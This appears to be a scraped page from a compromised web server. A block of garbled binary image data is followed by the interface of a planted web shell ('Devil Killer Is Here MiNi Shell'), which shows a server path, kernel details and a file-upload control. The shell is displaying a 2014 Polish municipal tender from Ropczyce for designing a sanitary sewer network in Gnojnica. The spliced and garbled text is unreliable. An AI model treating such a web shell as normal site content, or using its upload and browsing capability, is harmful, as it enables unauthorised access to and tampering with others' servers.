JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140818/273848-N-2014.html

<p class="kh_header"><b>Ropczyce: Projektowanie kanalizacji sanitarnej w miejscowości Gnojnica</b><br>
<b>Numer ogłoszenia: 273848 - 2014; data zamieszczenia: 18.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ropczyce , ul. Krisego 1/30, 39-100 Ropczyce, woj. podkarpackie, tel. (017) 2210550, faks (017) 2210555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ropczyce.umig.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projektowanie kanalizacji sanitarnej w miejscowości Gnojnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Opis przedmiotu zamówienia. 
1.1	Przedmiotem zamówienia jest wykonanie dokumentacji projektowej dla budowy sieci kanalizacji sanitarnej wraz z przyłączami w miejscowości Gnojnica - sołectw Gnojnica Dolna i Gnojnica Wola. Przewidywana łączna długość głównych sieci kanalizacji sanitarnej do zaprojektowania wynosi około 30 km. Przewidywana łączna ilość przyłączy kanalizacyjnych do za-projektowania to około 400 budynków.
1.2	Zakres prac projektowych obejmuje zaprojektowanie kanalizacji sanitarnej z przyłącza-mi w miejscowości Gnojnica i w Ropczycach wzdłuż ul. Rzeszowskiej oraz kanalizacji do  miejsca włączenia do zaprojektowanej sieci kanalizacji sanitarnej w rejonie ronda 650-lecia Ropczyc przy ul. Ogrodniczej.
1.3	Projekt kanalizacji należy opracować w dwóch częściach, objętych oddzielną dokumentacją i pozwoleniem na budowę. Część pierwszą, która obejmować winna sołectwo Gnojnica Dolna z przesłaniem ścieków do projektowanej kanalizacji sanitarnej przy rondzie 650-lecia Ropczyc oraz część drugą obejmującą Gnojnicę Wolę - obszary zaznaczone na załączniku graficznym (zał. Nr 2A  do SIWZ).
2.	Zakres przedmiotu zamówienia obejmuje w szczególności:
2.1.	 Nabycie niezbędnych map ewidencyjnych i zasadniczych, oraz aktualizacja map do celów projektowych numerycznych a także nabycie aktualnych wypisów z ewidencji gruntów.
2.2.	 Wykonanie badań geologicznych.
2.3.	 Przygotowanie kompletnych wniosków i dokumentacji formalno - prawnych obejmujących wszelkie niezbędne pozwolenia, decyzje, uzgodnienia, opinie, warunki techniczne przyłączenia do sieci energetycznej, kanalizacyjnej, wypisy i wyrysy z ewidencji gruntów dla działek ewidencyjnych, po których przebiegać będzie trasa projektowanego uzbrojenia, zgody na wejście w teren w celu wykonania robót oraz inne dokumenty wymagane do uzyskania pozwolenia na budowę dla inwestycji objętych przedmiotem zamówienia.
2.4.	 Sporządzenie umów cywilnoprawnych z właścicielami i użytkownikami działek na których projektowana będzie: kanalizacja sanitarna, przykanaliki, przepompownie z zasilaniem energetycznym, drogi dojazdowe i place manewrowe, według stanu prawnego na dzień przekazywania dokumentacji zamawiającemu. 
2.5.	Dla działek o nieuregulowanym stanie własnościowym/prawnym do umów z ich użytkownikami należy dołączać oświadczenia użytkowników o użytkowaniu działki oraz należy przygotować wykaz tych działek zawierający nr działki, imię i nazwisko użytkownika 
2.6.	W przypadku braku zgody na podłączenie do kanalizacji sanitarnej budynku zlokalizowanego w terenie o zwartej zabudowie należy przedkładać na bieżąco Zamawiającemu dokumenty potwierdzające rezygnację właściciela budynku z ujęcia projektu przyłącza w opracowywanych w ramach niniejszego zamówienia projektach wraz z podaniem przyczyn. Ponadto Zamawiający na bieżąco winien być informowany o budynkach, których podłączenie spowoduje niewspółmiernie wysokie koszty realizacji i eksploatacji.
2.7.	Przygotowanie kompletnych wniosków z załącznikami dla uzyskania decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięć w tym sporządzenie kart informacyjnych przedsięwzięcia - w 4 egzemplarzach. 
2.8.	Przygotowanie kompletnych wniosków z załącznikami dla uzyskania decyzji na lokalizację sieci w pasie drogowym dróg publicznych poszczególnych kategorii.
2.9.	Przygotowanie kompletnych wniosków z załącznikami dla uzyskania decyzji o ustaleniu lokalizacji inwestycji celu publicznego.
2.10.	Przygotowanie kompletnych wniosków z załącznikami dla uzyskania pozwoleń wodnoprawnych w tym operatów wodno-prawnych w 3 egzemplarzach.
2.11.	Opracowanie projektów budowlanych i wykonawczych kanalizacji sanitarnej z przyłączami i innymi niezbędnymi urządzeniami, zgodnie z warunkami technicznymi, normami i wymaganymi uzgodnieniami - w 6 egzemplarzach projekty budowlane, w 4 egzemplarzach projekty wykonawcze.
2.12.	Opracowanie dokumentacji kosztorysowych obejmującej kosztorysy inwestorskie i przedmiary robót - po 2 egzemplarze. 
2.13.	Opracowanie szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych dla projektowanej kanalizacji sanitarnej  - w 4 egzemplarzach.
2.14.	Przygotowanie kompletnych wniosków z załącznikami dla uzyskania pozwoleń na budowę.
2.15.	Przygotowanie informacji bioz w 2 egzemplarzach.
2.16.	 Przekazanie Zmawiającemu całości dokumentacji projektowej w wersji elektronicznej tj. zapisanej na nośniku CD lub DVD w wersji pdf do edytowania przez pakiet programów OFFICE, kosztorysy w programie NORMA w formacie ath lub.xml., mapy do celów projektowych i  projektu zagospodarowania w wersji elektronicznej. 
3.	Szczegółowe warunki realizacji przedmiotu zamówienia:
3.1	Wykonawca zobowiązany jest na bieżąco uzgadniać z Zamawiającym wszelkie proponowane rozwiązania projektowe.
3.2	Lokalizację projektowanego uzbrojenia terenu wykonawca uzgodni z właścicielami i użytkownikami działek, na których będzie ono projektowane oraz uzyska od nich zgodę na wejście w teren w celu wykonania robót w formie umowy cywilno- prawnej, zawierającej za-łącznik graficzny przedstawiający uzgodnioną lokalizację projektowanego uzbrojenia.
3.3	O ile uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia będzie tego wymagało, oprócz karty informacyjnej przedsięwzięcia wykonawca sporządzi również raport o oddziaływaniu inwestycji na środowisko.
3.4	Na potrzeby uzyskania wszelkich wymaganych pozwoleń wodnoprawnych, wykonawca każdorazowo sporządzi niezbędne w tym zakresie operaty wodnoprawne.
3.5	Wykonawca sporządzi zestawienie tabelaryczne projektowanych przyłączy kanalizacyjnych zawierające co najmniej takie informacje, jak: długość, średnice, pompownie i ilości przy-łączy kanalizacyjnych, zakres ilościowy będący siecią, przyłączem oraz doziemnym odcinkiem instalacji kanalizacji sanitarnej. O ile będą tego wymagały przyjęte przez wykonawcę rozwiązania projektowe, sporządzi on inwentaryzacje zieleni kolidującej z projektowanym uzbrojeniem i przygotuje stosowne kompletne wnioski o wydanie decyzji na wycinkę tej zieleni.
3.6	Wykonawca uzyska wszelkie niezbędne warunki, zgody, uzgodnienia branżowe, decyzje itp. niezbędne do uzyskania decyzji o pozwoleniu na budowę.
3.7	Przed wystąpieniem do właściwego organu z wnioskiem o wydanie decyzji o pozwoleniu na budowę, wykonawca uzgodni z Zamawiającym ostateczną wersję projektu budowlanego i wykonawczego.
3.8	Wykonawca sporządzi kosztorys inwestorski oraz przedmiar robót odrębnie dla sieci, przyłączy, pompowni, zasilania energetycznego, utwardzenia dróg i placów manewrowych a także odrębnie dla terenu miasta i wsi.
4.	 Sposób wykonania prac projektowych:
4.1.	Projekty budowlane, projekty wykonawcze, przedmiary robót, specyfikacje techniczne wykonania i odbioru robót budowlanych winny, być zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z  2004r., Nr 202 poz. 2072 z późn. zm.).
4.2. Projekty budowlane i wykonawcze winny być zgodne z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia  25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 poz. 462).
4.3. Przygotowanie dokumentów do decyzji o pozwoleniu na budowę, zgodnie z wymogami ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( tekst jedn. Dz. U z 2013 r. poz. 1409 z późn. zm.) dla niniejszego zamówienia.
4.4.  Opis przedmiotu zamówienia winien być zgodny z art. 29 i 30 Ustawy PZP.
4.5. Dokumentacja projektowa ma posiadać niezbędne uzgodnienia w tym uzgodnionie w zakresie uzbrojenia terenu w ZUDP w Ropczycach.
4.6. Kosztorysy inwestorskie i przedmiary robót należy przygotować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130 poz.1389).
5.	Ogólne warunki techniczne projektowania sieci kanalizacji sanitarnej:
5.1. Sieć kanalizacji sanitarnej grawitacyjnej należy zaprojektować z rur PCV-U litych lub PP, kanalizację ciśnieniową z rur PE. 
5.2. Średnice kanałów projektować zgodnie z warunkami technicznymi, obliczeniami i norma-mi dla zapewnienia właściwej przepustowości hydraulicznej i wytrzymałości przewodów.
5.3. Kanały należy lokalizować w nieutwardzonym terenie, a w razie konieczności -wyjątkowo w poboczach jezdni, pod jezdniami lub w terenach z nawierzchnią twardą.
5.4. W razie wystąpienia kolizji projektowanej sieci z istniejąca infrastrukturą, należy zaprojektować likwidację kolizji. 
5.5 Na skrzyżowaniach ulicy, w miejscach odgałęzień sieci w drogi boczne należy zaprojektować studnie rewizyjne betonowe fi 1,0 lub 1,2 m.
5.6. Studzienki rewizyjne na kanałach projektować na odcinkach prostych w odległościach nieprzekraczających 50 m i przy każdej zmianie kierunku, spadku i przekroju.
5.7. Należy projektować studnie z tworzywa sztucznego PP, PE, PVC, DN 0,4-1,0 m oraz studnie betonowe fi 1,0-1,2 m na sieci w rozstawie 150-250 m.
5.8. Należy przewidzieć lokalizację i zaprojektować punk zlewny ścieków składający się z  tacy najazdowej, separatora zanieczyszczeń stałych, kontenera z przewodem do odbioru i pomiaru ilości ścieków, zbiornik uśredniający, kanał odpływowy ścieków.
5.9. Zagłębienie kanałów powinno zapewnić grawitacyjny odpływ ścieków z obiektów kanalizowanych poniżej strefy zamarzania i nie powodować kolizji z innymi urządzeniami. Ustalając zagłębienie kanału i spadek kanału, należy uwzględnić prędkość zapewniającą samooczyszczenie kanału.
5.10. Należy stosować takie rozwiązania, które pozwolą ograniczyć uciążliwości związane z eksploatacją zaprojektowanych systemów kanalizacyjnych.
5.11. Na końcu przewodu tłocznego projektować studnie rozprężne. Przykrycie przewodów kanalizacyjnych tłocznych i posadowienie przyjmować jak dla przewodów wodociągowych. Do budowy przewodów tłocznych stosować rury PE do kanalizacji ciśnieniowej. 
6. Ogólne  warunki techniczne projektowania urządzeń kanalizacyjnych- przepompownie ścieków:
6.1	Przepompownie w zakresie hydrauliki, gabarytów obiektu i lokalizacji projektować zgodnie z warunkami technicznymi w pobliżu sieci energetycznych  na działkach mających dojazd z dróg publicznych. Teren wokół przepompowni winien być ogrodzony, oraz w razie potrzeby posiadać utwardzony dojazd i plac manewrowy. 
6.2	Średnica przepompowni musi zapewnić możliwość swobodnego montażu pomp oraz wyposażenia wewnętrznego.
6.3	Przepompownie projektować jako studnie podziemne z polimerobetonu, z włazem do pompowni wyniesionym ponad teren do wysokości 0,5 m (w przypadku lokalizacji pod ciągiem komunikacyjnym projektować pompownie przystosowane do ruchu pojazdów, z włazem przystosowanym do montażu w jezdni drogi).
6.4	W projekcie przepompowni uwzględnić monitoring z zastosowaniem radiomodemów SATELLINE 3AS 869 w zakresie niezbędnym dla transmisji danych, umożliwiający realizację funkcji sterowania pracą przepompowni ścieków.
6.5	Układ sterowniczy przepompowni projektować tak, aby był zainstalowany w skrzynce sterowniczej obok przepompowni. Praca pomp sterowana ma być w trybie automatycznym naprzemiennie. Praca pomp ma być załączana po osiągnięciu  zwierciadło ścieków poziomu maksymalnego i wyłączana przy poziomie minimalnym. Stan awaryjny pracy przepompowni ma uruchamiać moduł alarmowy skrzynki sterowniczej.
6.6	Projektować przepompownie standardowo wyposażone w dwie pompy. Wszystkie elementy metalowe projektować w wykonaniu nierdzewnym. Dobór urządzeń typ i producenta należy uzgodnić z użytkownikiem istniejącej kanalizacji sanitarnej.
7. Dodatkowe informacje:
7.1	Teren objęty zamówieniem w części obejmującej miasto Ropczyce jest objęty częściowo przygotowywanym obecnie Miejscowym Planem Zagospodarowania Przestrzennego, po-zostały obszar i cała miejscowość Gnojnica nie jest objęta aktualnym Miejscowym Planem Za-gospodarowania Przestrzennego.
7.2	Teren miejscowości Gnojnica oraz Ropczyc nie leży na terenie Parku Krajobrazowego i jego otuliny ani Europejskiej Sieci Ekologicznej Natura 2000. 
7.3	W ramach zamówienia nie będzie konieczności przekraczania dróg krajowych ani wojewódzkich projektowanym uzbrojeniem.
7.4	Zamawiający w 2014r.  przewiduje zapłatę wynagrodzenia do wysokości 50 tys. zł.  
7.5	Nie przewiduje się składania ofert częściowych.
7.6	Nie dopuszcza się przedstawiania ofert wariantowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy przystępujący do przetargu są zobowiązani wnieść wadium w wysokości 3 000,00 zł, w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub w formie poręczeń udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt. 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007r. Nr 42, poz. 275).
W przypadku wnoszenia wadium w pieniądzu należy dokonać wpłaty na konto Zamawiającego nr 39 9171 0004 0000 8136 2000 0050 w Banku Spółdzielczym w Ropczycach. Wadium należy wnieść przed upływem terminu składania ofert. Przy czym wniesienie wadium w pieniądzu, Zamawiający uzna za skuteczne w chwili uznania rachunku bankowego. Do oferty należy dołączyć dokument potwierdzający wniesienie wadium w oryginale lub w przypadku wnoszenia wadium  w pieniądzu w formie kserokopii potwierdzonej za zgodność z oryginałem przez uprawnionych przedstawicieli wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca potwierdzi spełnianie tego warunku składając odpowiednie oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jeden projekt kanalizacji sanitarnej z przepompownią ścieków o długości około 15 km.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca potwierdzi spełnianie tego warunku składając odpowiednie oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca udokumentuje dysponowanie osobami, które wskaże do uczestniczenia w wykonaniu niniejszego zamówienia, w tym co najmniej dwie osoby posiadające:
a/ uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci i instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń określone przepisami prawa budowlanego lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
b/ doświadczenie w realizacji zamówień porównywalnych z niniejszym zamówieniem t.j. opracowały należycie w okresie ostatnich trzech lat co najmniej jeden projekt sieci kanalizacji sanitarnej z przepompownią ścieków o długości około 15 km.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca potwierdzi spełnianie tego warunku składając odpowiednie oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca, wykazując spełnianie warunków, o którym mowa w art. 22 ust. 1 ustawy PZP, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy PZP, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych ust. 2 rozdziału XI SIWZ.
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3. Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy PZP, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy PZP, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dołączenia przez Wykonawcę do oferty dokumentów dotyczących w szczególności: 
1)  zakresu dostępnych Wykonawcy zasobów innego podmiotu,
2) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
3)  charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
4)  zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
